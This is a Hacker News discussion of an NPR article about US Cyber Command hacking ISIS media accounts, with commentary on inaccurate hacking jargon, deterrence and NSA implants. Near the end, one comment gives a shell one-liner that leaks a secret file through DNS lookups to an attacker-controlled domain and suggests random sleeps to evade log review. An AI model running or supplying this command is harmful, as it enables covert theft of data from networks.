[segfaultbuserr]

I fully understand that the operation is classified and details cannot be revealed, but I have to say: the description of the technical details is still a bad Hollywood movie [0]...

> After that, the momentum started to build. One team would take screenshots to gather intelligence for later; another would lock ISIS videographers out of their own accounts.

> "Reset Successful" one screen would say.

> "Folder directory deleted," said another.

Folder directory??? Did they also delete the "file document"?

> The screens they were seeing on the Ops floor on the NSA campus were the same ones someone in Syria might have been looking at in real time, until someone in Syria hit refresh. Once he did that, he would see: 404 error: Destination unreadable.

404 error: Destination unreadable??? At least, use "unreachable"...

> "Target 5 is done," someone would yell.

> Someone else would walk across the room and cross the number off the big target sheet on the wall. "We're crossing names off the list. We're crossing accounts off the list. We're crossing IPs off the list," said Neil. And every time a number went down they would yell one word: "Jackpot!"

[0] TV Tropes: Hollywood Hacking is when some sort of convoluted metaphor is used not only to describe hacking, but actually to put it into practice. Characters will come up with rubbish like, "Extinguish the firewall!" and "I'll use the Millennium Bug to launch an Overclocking Attack on the whole Internet!" https://tvtropes.org/pmwiki/pmwiki.php/Main/HollywoodHacking

[the_af]

Agreed. The whole article reads like a mix of Hollywood Hacking and a puff piece.

Very likely something happened, but it almost certainly wasn't like this.

[acqq]

The article is different from what was aired, which appears to me to be more interesting, as it starts with:

"On August 24, 2015, a 21-year-old British hacker named TriCk stepped out of an Internet cafe in Raqqa, Syria, and climbed into his car. He didn't know it, but he'd been under surveillance for days. He pulled into a gas station, and just as he started filling the tank, a single Hellfire missile came down on him like a meteor from the sky. He was killed instantly."

And it seems to be longer too.

https://www.npr.org/transcripts/763545811

They also later identify the "British hacker's" name: Junaid Hussain.

A report from Britain, 2015, claims it wasn't an operation done by the U.S. alone:

https://www.birminghammail.co.uk/news/midlands-news/isis-ter...

[Stierlitz]

@acqq: "On August 24, 2015, a 21-year-old British hacker named TriCk stepped out of .."

That story, and that's what it is, has to be put in the form of a bad movie, considering the intellectual level of the target audience.

[aebtebeten]

https://xkcd.com/538/ with a USD 70k wrench? (even at that price, and including delivery, those wrenches sound much cheaper than Operation Glowing Symphony as described, involving headcount from at least three eyes)

Kipling on empire, in Her Majesty's Servants (a story addressed to children but not necessarily intended for them):

> "But are the beasts as wise as the men?" said the chief.

> "They obey, as the men do. Mule, horse, elephant, or bullock, he obeys his driver, and the driver his sergeant, and the sergeant his lieutenant, and the lieutenant his captain, and the captain his major, and the major his colonel, and the colonel his brigadier commanding three regiments, and the brigadier his general, who obeys the Viceroy, who is the servant of the Empress. Thus it is done."

> "Would it were so in Afghanistan!" said the chief; "for there we obey only our own wills."

> "And for that reason," said the native officer, twirling his moustache, "your Amir whom you do not obey must come here and take orders from our Viceroy."

[acqq]

Returning to the topic and 2020, from the transcript of the 50-minute show I've mentioned:

"Nakasone said the American people shouldn't worry about the 2020 elections because Cybercom is prepared to prevent the Russians from repeating what they did in 2016."

"TEMPLE-RASTON: Even saying that much is new. Remember - offensive cyber not so long ago was something they didn't talk about, and now, all of a sudden, they seem to be. So why is General Nakasone talking about this now?

DEIBERT: What's happening here is part of a deterrent justification."

Then they give an explanation of this using some lines from Dr. Strangelove.

By the way, the show was "written and hosted by Dina Temple-Raston," who also wrote the article, and I liked the show.

-----

Edit: responding to "deterrent could easily be communicated privately" below: -- no, that's too narrow thinking: consider the potential target as "anybody who'd be willing to try it at home." That's a much bigger target group than potential workers. Also consider every "it" that people would be potentially scared to do.

Edit2: re. the edit of the post below involving joke with the submarines -- I fail to see any relation to anything discussed here, and I'd also like to know if anybody but the writer even understands what the joke is. I honestly don't. Meh.

Edit3: re "MAD": Like I've said I don't believe it's about MAD, but "anybody who'd be willing to try it at home." Anybody in front of the computer anywhere in the world, including, but not exclusively, some future "Junaid Hussain." (and, if I'm closer to the correct answer, Cybercom can give me 10 upvotes here).

Edit4: I think I understand it now after it's added that the "joke meant to illustrate MAD" -- I guess he didn't follow the link, but reacted to "Dr. Strangelove" reference believing it's about MAD, even if it never was. As per transcript, it's there to argue: "if you keep it a secret [i.e. American offensive cyber operations] - you could say the same thing about American offensive cyber operations. They've been so stealthy for so long, maybe people don't realize the U.S. has them." Note "people." As is, people wouldn't be scared to do something the U.S. doesn't like, instead of thinking who'd be the target of next U.S. drone attack.

[082349872349872]

Sorry, I was reacting to the Dr. Strangelove from the article, especially the "end of"[1] description. Maybe it was more obvious in the transcript? I believed it to be about MAD because who, since 2010 (Stuxnet), could plausibly believe that non-decisive[2] American offensive cyber operations are not at least a potential thing?

As written in https://news.ycombinator.com/item?id=24522125 I don't believe everyone apparently having more offensive than defensive capability is necessarily the most stable of situations.

[1] the true end: https://www.youtube.com/watch?v=cIpTE-aHEZ0

On the "mineshaft gap": https://news.ycombinator.com/item?id=23712008

Have you got change for 20 million people? https://boardgamegeek.com/boardgame/713/nuclear-war

[2] "There was too much there to move, and we knew we had to break [Chrome], burn her straight down, or she might come after us."

[acqq]

Not having the whole story arc about Junaid Hussain is the main difference between the show (as seen in the transcript) and the article. I was talking about the former from the start, as it can be easily seen.

The point in the article after mentioning Dr. Strangelove uses however the same wording that I've pointed to:

"You could say the same thing about American offensive cyber operations. They have been so stealthy for so long, maybe people don't realize we have them."

[082349872349872]

(a) deterrent could easily be communicated, and much more easily clarified, privately.

(b) taking out an electrical grid is not at all comparable to MAD.

I'd imagine domestic recruiting to be more likely, along the lines of the prime-time channel 1 song-and-dance mentioned in: https://news.ycombinator.com/item?id=24453689

==== Edit: joke meant to illustrate (b), the Assured Destruction part that makes MAD a non-iterated game. I agree that if TFA is not about MAD, then threatening Proportional Inconvenience can be an effective deterrent in an iterated game, a deterrent much more applicable to future Hussains than to future Bystrovs. (indeed, in that scenario, I would worry about non-nuclear powers swatting each other via Uscybercom) ====

In the middle of the Carribean, a US sub, gleaming and spotless, surfaces next to a dingy-in-comparison russian sub, whose boomers are sprawled out in undershorts and telnyashki, listlessly passing around vodka bottles across a littered foredeck.

One of them is murmuring over and over again, "which one of you idiots threw slippers on control board?"

On the US sub, a dress-uniformed officer in Randolph Engineering glasses emerges from the hatch. "This is the Captain of the USS Alaska. May I speak with your captain, please?"

On board the russian sub, the only response is the clinking and refilling of glasses.

"I repeat, I am Commander William Dull, captain of the USS Alaska, SSBN 732. I would like to speak with your captain!"

A small fight breaks out on the russian sub over who last poured.

"Damn it, what is up with you russkies? Do you call that shipshape? At least we learn discipline back home at King's Bay! Di. Sci. Pline!"

"Don't you get it?" yells back the murmuring russian, in english now. "Is no King's Bay any more." Then he recommences his russian refrain, a little more loudly, "Oi, which one of you idiots threw valenki on control board?"

[culturestate]

> Folder directory??? Did they also delete the "file document"?

I obviously don't know how accurate this piece is but a "folder directory" is, or at least used to be, a legit way to describe a folder full of folders.

You'll see outdated/unorthodox terminology like this all the time in old systems, and even some newer ones that were built or maintained by people who aren't native English speakers. Daily WTF used to be filled with this kind of stuff.

[segfaultbuserr]

> a "folder directory" is, or at least used to be, a legit way to describe a folder full of folders.

Thanks, that's interesting.

[sillysaurusx]

Ok, I'll tell you how it goes in the real world. I worked for a somewhat HN-famous pentesting company several years ago.

"So, X has been infiltrating <company> for the past few days."

"Really? <company>? <famous company>?"

"Yep. We're keeping them looped in on everything, and they told us to try to get as far as possible. Apparently they were running <outdated version> of <software> on one of their boxes, and <scanner> picked it up."

"That actually happens?"

"He's <highly surprising claim> right now. You'd be surprised how far you can get, jumping from one box to another."

I can't give much more detail than that, for obvious reasons, but the reality is that it's very methodical, very "boring" work. It's basically a giant matrix of probabilities: there are hundreds of thousands of attack vectors, and your job is to tap as many as possible, sorted by probability of effectiveness, until something sticks. Then use your head to get further, adapting to the situation on the fly.

And ... writing reports. Jesus, if someone had told me that 70% of your day would be spent writing reports, I probably wouldn't have joined. But the 30% of other stuff made up for it.

That feeling you get when you break into somewhere you're not supposed to be, and that you were paid to do it, is amazing. The rules change from engagement to engagement, but usually it's "do whatever you want, but don't modify any data, i.e. no destructive actions, and all info you've collected will be deleted at the end of the engagement."

Must be interesting to be a spook in the NSA doing that kind of stuff offensively.

Also, it might seem absurd that I'm comparing this story to the most elite hackers in the developed world. And maybe it is. But if you knew which <company> it was, and exactly what <highly surprising claim> was, you'd be shocked that one or two smart developers poking at internals were able to compromise the entire corporate network of <famous company>, to the point of being able to... well. Let's just say, I wish I could say. It's a weird feeling, seeing it with my own eyes, knowing it's true, and never being able to talk fully about it. :)

So I imagine the NSA spooks are doing similarlly-methodical work, with some cheat codes like "we intercepted their computer before delivery and installed a backdoor that only activates when we send a specially malformed packet that would normally be dropped and is therefore invisible, which grants us access as needed."

[DoctorOetker]

> [...] a specially malformed packet [...]

as far as I understand error correcting codes can and are used at different levels of communication protocols (hardware each link, hardware at endpoints, software at end points, ...)

I often wonder if recoverable errors at the endpoints are ever used to exfiltrate data? the higher levels of the stack would see the corrected overt message, while underlying levels (hardware or software) that perform the error correction has access to the covert information encoded in the error.

This may be testable by FPGA and sorting connections by protocol, origin, destination, ... to identify connections with suspiciously high amount of ECC recoverable errors as compared to the rest.

This may be very hard to test if MitM'ed (by ISP, network card manufacturer, ...) such that benign packets get recoverable errors introduced as well (to hide the malicious ones in the noise), which would increase the complexity since now the malicious hardware or software at the endpoints needs to discriminate artificial errors from covert messages over the error channel. There would be many ways of going about this.

[082349872349872]

If the cheat codes were along the lines of "as long as they're using anyone's routers but Huawei's" they would not even require interception and customisation.

[sillysaurusx]

I wish I understood it better, because it's a real technique that the NSA uses, as far as I know. And I agree that it seems like it shouldn't be that simple.

Here's one I do understand: Suppose you want to exfiltrate some data out of a network without raising alarms. One way to do it is to set up a DNS server. Basically, you use DNS itself as a communication method, not merely a lookup table.

I've never actually used it, but it always seemed a cool idea. Almost no one blocks DNS, which means you can send data from anywhere in the world in a very unexpected way. You'd of course want to keep the transmission size reasonable (perhaps 5GB of DNS traffic might raise some eyebrows) but any system that you can `nslookup foo.com 8.8.8.8` on, you'd be able to `nslookup foo.com <your special server>` on. So this technique works in almost every case, except extremely monitored systems that only allow outgoing connections to a specific set of restricted IP addresses.

But for the special network protocol that the NSA uses to access backdoored NICs, I forget why it works, since the packet would need to pass through many routers along the way. In fact, I feel like I'm misremembering. Most target computers are behind routers, so it really doesn't make sense. Maybe it's a technique used against routers themselves. All I remember is that the NSA has some type of "signals we can send which normal networking tooling doesn't detect at all," along with a dose of "we know Iran just ordered some new servers, so we intercepted the servers and installed a backdoor." (The latter is called TAO: https://en.wikipedia.org/wiki/Tailored_Access_Operations)

They definitely do something with NICs though. The ANT document (https://en.wikipedia.org/wiki/NSA_ANT_catalog#Capabilities_l...) shows "COTTONMOUTH-III is a stacked Ethernet and USB plug costing approximately $1.25M for 50 units." Must be one hell of a plug.

https://en.wikipedia.org/wiki/NSA_ANT_catalog#/media/File:NS... is also pretty neat. It's a USB airgap bridge, i.e. janitor walks up and plugs it in to the target device. I wonder what the range on stuff like that is... Seems like you'd have to be sitting outside in a van or something, which is rather hard to do if your target is a nuclear enrichment facility (stuxnet).

[082349872349872]

Extremely monitored systems should probably communicate by tape, or cdrom, or similar write-mostly data diode medium. I've heard the US launch network updated mostly via paper tape for a long time. Today it occurred to me that people could, in principle, hand verify that two short paper tapes were identical, without needing to trust the integrity of any technological black boxes.

[goatinaboat]

you'd be able to `nslookup foo.com <your special server>` on

You don’t need to tell nslookup to use a special server. If you control the SOA for your own domain, the normal DNS server will happily exfiltrate your data for you.

[DaiPlusPlus]

Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server I ran on my colocated rack to allow me to surf the wider web when my laptop was connected to Wi-Fi captive portals.

The technique worked well for portals that allowed arbitrary DNS-over-UDP as well as portals that had their own exclusive DNS - provided that those portals worked by redirecting all IP traffic (i.e. they didn't fake DNS results).

It was slow though... I think I maxxed-out at around 8KBps (~64kbps) - barely enough for basic email functionality and text-only web-surfing.

[goatinaboat]

Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server

It's even easier that if you just want to sneak a relatively small file out.

    for n in $(base64 mysecretfile|sed  's/.\{63\}/&\n/g'); do nslookup $n.myevildomain.com; done

Then get the file out of your evil DNS server logs at the other end. Of course this depends on how much DNS logging the local site is doing and if anyone is paying attention to those logs, but a few random sleeps should help there.

[082349872349872]

circumstantial language (suggesting simplicity) in the 2020 defense appropriations bill, note cyber and collection:

https://www.congress.gov/bill/116th-congress/senate-bill/179...

§ 5707 (c)(2): "the implications of [5G] global and regional adoption on the cyber and espionage threat to the United States, the interests of the United States, and the cyber and collection capabilities of the United States;"

[giancarlostoro]

It is very possible they are using utilities to pull this off developed by someone else. They may have training for the utilities they have but that doesnt make them IT experts.

[EmilioMartinez]

They did do one healthy clarification to that effect:

>And what they contained weren't glowing lines of code: Instead, Neil could see login screens.

[bryanrasmussen]

> "Folder directory deleted," said another.

maybe they're dealing with the kind of people who name their folders "directory"

[rebuilder]

Or the truly perverse kind who name their directories "Folder"